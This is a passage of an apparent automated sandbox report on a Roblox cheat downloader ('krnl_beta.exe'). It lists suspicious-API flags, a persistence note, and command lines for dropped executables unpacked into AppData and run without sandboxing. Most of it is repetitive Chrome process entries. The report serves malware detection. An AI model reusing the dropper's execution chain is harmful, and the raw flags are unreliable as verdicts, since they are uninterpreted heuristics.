1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
3596	chrome.exe
3596	chrome.exe
3596	chrome.exe
3596	chrome.exe
3596	chrome.exe
3596	chrome.exe
3596	chrome.exe
3596	chrome.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

New jailbreak script - Linkvertise Downloader_51-dwu1.tmpNew jailbreak script - Linkvertise Downloader_51-dwu1.tmpRobloxPlayerBeta.exeOpenWith.exeOpenWith.exeRobloxPlayerBeta.exeOpenWith.exeOpenWith.exe

pid	process
5316	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
3208	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
2240	RobloxPlayerBeta.exe
2240	RobloxPlayerBeta.exe
6464	OpenWith.exe
6384	OpenWith.exe
3788	RobloxPlayerBeta.exe
3788	RobloxPlayerBeta.exe
1764	OpenWith.exe
7132	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1652 wrote to memory of 2540	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 2540	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 532	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 2712	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 2712	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe
PID 1652 wrote to memory of 5044	1652	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3168

C:\Users\Admin\AppData\Local\Temp\krnl_beta.exe
"C:\Users\Admin\AppData\Local\Temp\krnl_beta.exe"
2⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3724

C:\Users\Admin\AppData\Roaming\Krnl\Data\7za.exe
"C:\Users\Admin\AppData\Roaming\Krnl\Data\7za.exe" x "C:\Users\Admin\AppData\Roaming\Krnl\krnl.7z" -o"C:\Users\Admin\AppData\Roaming\Krnl" -aoa -bsp1
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:444

C:\Users\Admin\AppData\Roaming\Krnl\Data\7za.exe
"C:\Users\Admin\AppData\Roaming\Krnl\Data\7za.exe" x "C:\Users\Admin\AppData\Roaming\Krnl\Data\Community.7z" -o"C:\Users\Admin\AppData\Roaming\Krnl\Community" -aoa -bsp1
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Users\Admin\AppData\Roaming\Krnl\KrnlUI.exe
"C:\Users\Admin\AppData\Roaming\Krnl\KrnlUI.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4604

C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
"C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe" --type=gpu-process --no-sandbox --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Users\Admin\AppData\Roaming\Krnl\debug.log" --mojo-platform-channel-handle=2228 --field-trial-handle=2316,i,12178709051672999457,71947599583838148,131072 --disable-features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2 --host-process-id=4604
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
"C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --log-file="C:\Users\Admin\AppData\Roaming\Krnl\debug.log" --mojo-platform-channel-handle=2240 --field-trial-handle=2316,i,12178709051672999457,71947599583838148,131072 --disable-features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 --host-process-id=4604
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4252

C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
"C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Krnl\debug.log" --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=3092 --field-trial-handle=2316,i,12178709051672999457,71947599583838148,131072 --disable-features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --host-process-id=4604 /prefetch:1
4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908

C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
"C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Krnl\debug.log" --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=2316,i,12178709051672999457,71947599583838148,131072 --disable-features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --host-process-id=4604 /prefetch:1
4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:476

C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
"C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --no-sandbox --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --log-file="C:\Users\Admin\AppData\Roaming\Krnl\debug.log" --mojo-platform-channel-handle=2688 --field-trial-handle=2316,i,12178709051672999457,71947599583838148,131072 --disable-features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 --host-process-id=4604
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:6056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xb4,0x10c,0x7ffe62c19758,0x7ffe62c19768,0x7ffe62c19778
3⤵
PID:2540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:2
3⤵
PID:532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:2712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2220 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:5044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3264 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:2500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:4752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2924 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:4252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4548 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:1984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4412 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:4868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5004 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:3536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5152 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:1352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5004 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:3532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3152 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:3372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3444 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:4584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3916 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:1836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5420 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:4396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5692 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:4444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4872 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:4656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6068 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:5000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6072 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:5092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4456 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:4796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:2140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:4852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5688 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:5280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4588 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:5624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1192 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:5484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5104 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:6036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
- Modifies registry class
PID:6052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=3184 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:1336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1784 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:5388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=3320 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:5156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=3144 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:1360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6352 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:4144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=6428 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:4300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=5396 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:4468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=3252 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:3816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4492 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=6564 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:3656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=6416 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:4432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7112 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:5808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=1712 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:5392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=3404 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:5708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=6704 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:6056

C:\Program Files\Google\Chrome\Application\chrome.exe
